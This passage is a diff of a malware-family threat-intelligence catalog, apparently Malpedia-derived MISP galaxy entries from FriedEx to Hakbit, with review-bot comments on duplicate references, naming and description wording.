"https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/", + "https://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://sites.temple.edu/care/ci-rw-attacks/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - 
"https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/", - "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://www.secureworks.com/research/threat-profiles/gold-drake", "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", + "http://www.secureworks.com/research/threat-profiles/gold-drake", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" ], "synonyms": [ 
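Review bot: The FriedEx refs on the new side now contain the Secureworks gold-drake profile twice: the https form is moved up in the added block on the previous line, and this line adds `"http://www.secureworks.com/research/threat-profiles/gold-drake"` as a second entry differing only in scheme. Keep the https entry and drop the http one; if the generator merges reference lists from several Malpedia sources, normalizing the scheme and host before deduplicating would stop this class of duplicate from recurring. The rest of the hunk is reordering of existing references with a handful of genuine additions, which would be far easier to verify if refs were emitted in a stable sorted order. This hunk starts on the preceding line.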
@@ -15895,6 +18222,19 @@
 "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d",
 "value": "FriedEx"
 },
+ {
+ "description": "Fujinama is a custom VB info stealer capable to execute custom commands and custom exfiltrations, keylogging and screenshot. It was involved in the compromise of Leonardo SpA, a major Italian aerospace and defense company.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fujinama",
+ "https://reaqta.com/2021/01/fujinama-analysis-leonardo-spa"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "efd4ec64-ad22-424b-9b7a-d9060cc29d3b",
+ "value": "win.fujinama"
+ },
 {
 "description": "",
 "meta": {
@@ -16009,8 +18349,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
 "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf",
 "https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf",
+ "https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://www.wired.com/2017/03/russian-hacker-spy-botnet/",
 "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf",
 "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
 "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
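Review bot: The new Fujinama entry in the 15895 hunk sets `"value": "win.fujinama"`, which is the Malpedia slug rather than the family name; every other cluster in this file uses the display name as its value (`"FriedEx"`, `"FatalRat"`, `"FiveHands"`), and the galaxy tag derived from this value would read as the slug. Change it to `"value": "Fujinama"` and, since the description itself already uses that name, fix the generator's fallback so an entry without an upstream common name does not leak the identifier. While touching the entry, the description reads awkwardly; I would rewrite it as `"Fujinama is a custom VB infostealer that can execute custom commands, exfiltrate data, log keystrokes and take screenshots. It was involved in the compromise of Leonardo SpA, a major Italian aerospace and defense company."`, which states the same claims from the ReaQta reference.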
@@ -16048,6 +18392,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/", "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", "https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", 
@@ -16055,23 +18401,27 @@ "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", "https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/", "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", "https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "http://www.secureworks.com/research/threat-profiles/gold-garden", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", "https://isc.sans.edu/diary/23417", 
"https://www.secureworks.com/research/threat-profiles/gold-garden", "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", + "https://unit42.paloaltonetworks.com/revil-threat-actors/", "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/", @@ -16083,8 +18433,10 @@ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", "https://vimeo.com/449849549", "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/", "https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/", "https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", 
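Review bot: The added `"http://www.secureworks.com/research/threat-profiles/gold-garden"` duplicates the existing `"https://www.secureworks.com/research/threat-profiles/gold-garden"` that is still a context line a few entries below, differing only in scheme. Drop the added line rather than the https one: a plain-http reference in a threat-intel feed is needlessly exposed to tampering in transit, and consumers that dedupe refs by exact string will keep both. If the refs come from an upstream export, the same http/https pair appears in other entries of this commit and is worth normalising at the generator.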
@@ -16098,6 +18450,19 @@ "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275", "value": "Gandcrab" }, + { + "description": "A backdoor used by Mespinoza ransomware gang to maintain access to a compromised network.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gasket", + "https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7ed854ba-c280-4d5b-9b84-c61dddd43f66", + "value": "Gasket" + }, { "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only).", "meta": { @@ -16145,6 +18510,19 @@ "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada", "value": "Gazer" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner", + "https://bazaar.abuse.ch/browse/signature/GCleaner/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "874d6868-08fd-4b66-877d-fd2174f0d275", + "value": "GCleaner" + }, { "description": "", "meta": { @@ -16277,6 +18655,19 @@ "uuid": "a762023d-8d46-43a8-be01-3b2362963de0", "value": "get_pwd" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0sttimes", + "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9c89baf1-9639-4990-b218-14680170944f", + "value": "Gh0stTimes" + }, { "description": "", "meta": { 
@@ -16294,6 +18685,20 @@ "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd", "value": "Ghole" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostemperor", + "https://www.kaspersky.com/about/press-releases/2021_ghostemperor-chinese-speaking-apt-targets-high-profile-victims-using-unknown-rootkit", + "https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "968e52d1-e1d1-499a-acdc-b21522646e28", + "value": "GhostEmperor" + }, { "description": "", "meta": { @@ -16332,6 +18737,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", + "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf", "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", "https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack", 
@@ -16344,12 +18750,13 @@ "http://www.nartv.org/mirror/ghostnet.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood", "https://blog.cylance.com/the-ghost-dragon", + "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41", "https://s.tencent.com/research/report/836.html", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/", "https://blog.talosintelligence.com/2019/09/panda-evolution.html", "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-globe", "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", "https://www.datanet.co.kr/news/articleView.html?idxno=133346", 
@@ -16357,17 +18764,21 @@ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", "https://www.secureworks.com/research/threat-profiles/bronze-edison", + "https://documents.trendmicro.com/assets/Appendix_Water-Pamola-Attacked-Online-Shops-Via-Malicious-Orders.pdf", "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", "http://www.malware-traffic-analysis.net/2018/01/04/index.html", "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", "https://www.secureworks.com/research/threat-profiles/bronze-union", - "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://risky.biz/whatiswinnti/", "https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.trendmicro.com/en_us/research/21/d/water-pamola-attacked-online-shops-via-malicious-orders.html", "https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html", "https://hackcon.org/uploads/327/05%20-%20Kwak.pdf", - "https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/" + "https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/", + "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols" ], "synonyms": [ "Farfli", 
@@ -16380,7 +18791,7 @@ "value": "Ghost RAT" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gibberish", @@ -16390,7 +18801,7 @@ "type": [] }, "uuid": "f561656c-19d1-4b07-a193-3293d053e774", - "value": "Gibberish Ransomware" + "value": "Gibberish" }, { "description": "", @@ -16469,10 +18880,12 @@ "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", + "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://isc.sans.edu/diary/23417", "https://www.secureworks.com/research/threat-profiles/gold-swathmore", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://blog.ensilo.com/globeimposter-ransomware-technical", "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet" 
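Review bot: Renaming `"value"` from `"Gibberish Ransomware"` to `"Gibberish"` silently drops a name that downstream MISP instances and correlation rules may match on by string; the uuid is unchanged so object identity survives, but the old label should be kept reachable. Add it to the `"synonyms"` array, which sits between the two hunks of this entry: `"synonyms": ["Gibberish Ransomware"]`. The new one-word description `"Ransomware."` adds nothing over the empty string it replaces; either leave it empty like the neighbouring entries or give a sentence with the family's distinguishing trait.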
@@ -16513,14 +18926,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", + "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf", "https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728", "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", "http://resources.infosecinstitute.com/tdss4-part-1/", "https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451", + "https://habr.com/ru/company/solarsecurity/blog/578900/", "https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/", + "https://labs.k7computing.com/?p=22319", "https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html", + "https://community.riskiq.com/article/2a36a7d2/description", "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/" 
@@ -16682,11 +19099,13 @@ "value": "GoldenSpy" }, { - "description": "", + "description": "Gold Max is a Golang written command and control backdoor used by the NOBELIUM threat actor group. It uses several different techniques to obfuscate its actions and evade detection. The malware writes an encrypted configuration file to disk, where the file name and AES-256 cipher keys are unique per implant and based on environmental variables and information about the network where it is running.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldmax", "https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a", + "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques", "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/" ], "synonyms": [ @@ -16702,9 +19121,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", - "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite" + "https://www.youtube.com/watch?v=rfzmHjZX70s", + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf" + ], + "synonyms": [ + "Lovexxx" ], - "synonyms": [], "type": [] }, "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", 
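Review bot: The new GoldMax description spells the family as "Gold Max", while the malpedia ref (`win.goldmax`), the Microsoft blog slug and the `value` line (outside this hunk) all use the single word; the inconsistent spelling will defeat simple text searches across the cluster. Also "based on environmental variables" should be "based on environment variables", and "Golang written command and control backdoor" reads better as "command-and-control backdoor written in Go". Suggested first sentence: `"GoldMax is a command-and-control backdoor written in Go, used by the NOBELIUM threat actor group."`.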
@@ -16794,6 +19217,7 @@ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728", "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", + "https://securelist.com/gootkit-the-cautious-trojan/102731/", "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", "https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html", "https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/", @@ -16804,6 +19228,7 @@ "https://connect.ed-diamond.com/MISC/MISC-100/Analyse-du-malware-bancaire-Gootkit-et-de-ses-mecanismes-de-protection", "https://news.drweb.com/show/?i=4338&lng=en", "https://www.youtube.com/watch?v=QgUlPvEE4aw", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", @@ -16837,6 +19262,19 @@ "uuid": "fb2e42bf-6845-4eb3-9fe7-85a447762bce", "value": "Gophe" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gotroj", + "https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b4446bc0-41a1-4934-9fd0-a73b91589994", + "value": "GOTROJ" + }, { "description": "", "meta": { 
@@ -16855,14 +19293,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", - "https://www.secureworks.com/research/gozi", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://www.secureworks.com/research/threat-profiles/gold-swathmore", "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", + "https://www.secureworks.com/research/gozi", "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", "https://github.com/mlodic/ursnif_beacon_decryptor", "https://lokalhost.pl/gozi_tree.txt", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", "https://www.youtube.com/watch?v=BcFbkjUVc7o", + "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/" ], 
@@ -16925,10 +19368,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grandoreiro", + "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/", "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", - "https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks" + "https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks", + "https://blueliv.com/resources/reports/MiniReport-Blueliv-Bancos-ESP-LAT.pdf", + "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853" ], "synonyms": [], "type": [] 
@@ -16957,12 +19403,13 @@ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://content.fireeye.com/m-trends/rpt-m-trends-2020", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/", + "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season", "https://redcanary.com/blog/frameworkpos-and-the-adequate-persistent-threat/", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", - "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season", + "https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/", "https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf", - "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html" + "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", + "http://www.secureworks.com/research/threat-profiles/gold-franklin" ], "synonyms": [ "FrameworkPOS", 
@@ -17066,11 +19513,14 @@ "value": "GRILLMARK" }, { - "description": "", + "description": "GRIMAGENT is a backdoor that can execute arbitrary commands, download files, create and delete scheduled tasks, and execute programs via scheduled tasks or via the ShellExecute API. The malware persists via a randomly named scheduled task and a registry Run key. The backdoor communicates to hard-coded C&C servers via HTTP requests with portions of its network communications encrypted using both asymmetric and symmetric cryptography. GRIMAGENT was used during some Ryuk Ransomware intrusions in 2020.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent", - "https://twitter.com/bryceabdo/status/1352359414746009608" + "https://twitter.com/bryceabdo/status/1352359414746009608", + "https://blog.group-ib.com/grimagent", + "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets", + "https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer" ], "synonyms": [], "type": [] @@ -17095,6 +19545,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grunt", + "https://ti.qianxin.com/blog/articles/Suspected-Russian-speaking-attackers-use-COVID19-vaccine-decoys-against-Middle-East/", "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", "https://twitter.com/ItsReallyNick/status/1208141697282117633" ], 
@@ -17143,6 +19594,20 @@ "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", "value": "H1N1 Loader" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.habitsrat", + "https://www.intezer.com/blog/malware-analysis/habitsrat-used-to-target-linux-and-windows-servers/", + "https://www.intezer.com/blog/malware-analysis/habitsrat-used-to-target-linux-and-windows-servers" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b39de9b2-7739-44f4-a03b-1fffa0c0df04", + "value": "HabitsRAT (Windows)" + }, { "description": "", "meta": { 
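Review bot: The HabitsRAT refs list the same Intezer article twice, once with and once without a trailing slash; keep only `"https://www.intezer.com/blog/malware-analysis/habitsrat-used-to-target-linux-and-windows-servers/"`. Exact-string dedupe in consumers will not catch this, and it suggests the upstream export does not normalise URLs. The `"HabitsRAT (Windows)"` value implies a sibling Linux entry exists or is planned; if so, the two should cross-reference each other in `synonyms` or a related-entry field so analysts find both.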
@@ -17169,21 +19634,49 @@ "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", "value": "HackSpy" }, + { + "description": "Ransomware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hades", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure", + "http://www.secureworks.com/research/threat-profiles/gold-winter", + "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/", + "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", + "https://www.accenture.com/us-en/blogs/security/ransomware-hades", + "https://twitter.com/inversecos/status/1381477874046169089?s=20", + "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://awakesecurity.com/blog/incident-response-hades-ransomware-gang-or-hafnium/", + "https://www.accenture.com/us-en/blogs/cyber-defense/unknown-threat-group-using-hades-ransomware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ab9b4a89-c35b-42aa-bffb-98fccf7d318f", + "value": "Hades" + }, { "description": "Hakbit ransomware is written in .NET. It uploads (some) files to be encrypted to a ftp-server.\r\nThe ransom note is embedded - in earlier versions as plain string, then as base64 string. In some versions, these strings are slightly obfuscated.\r\n\r\nContact is via an email address hosted on protonmail. 
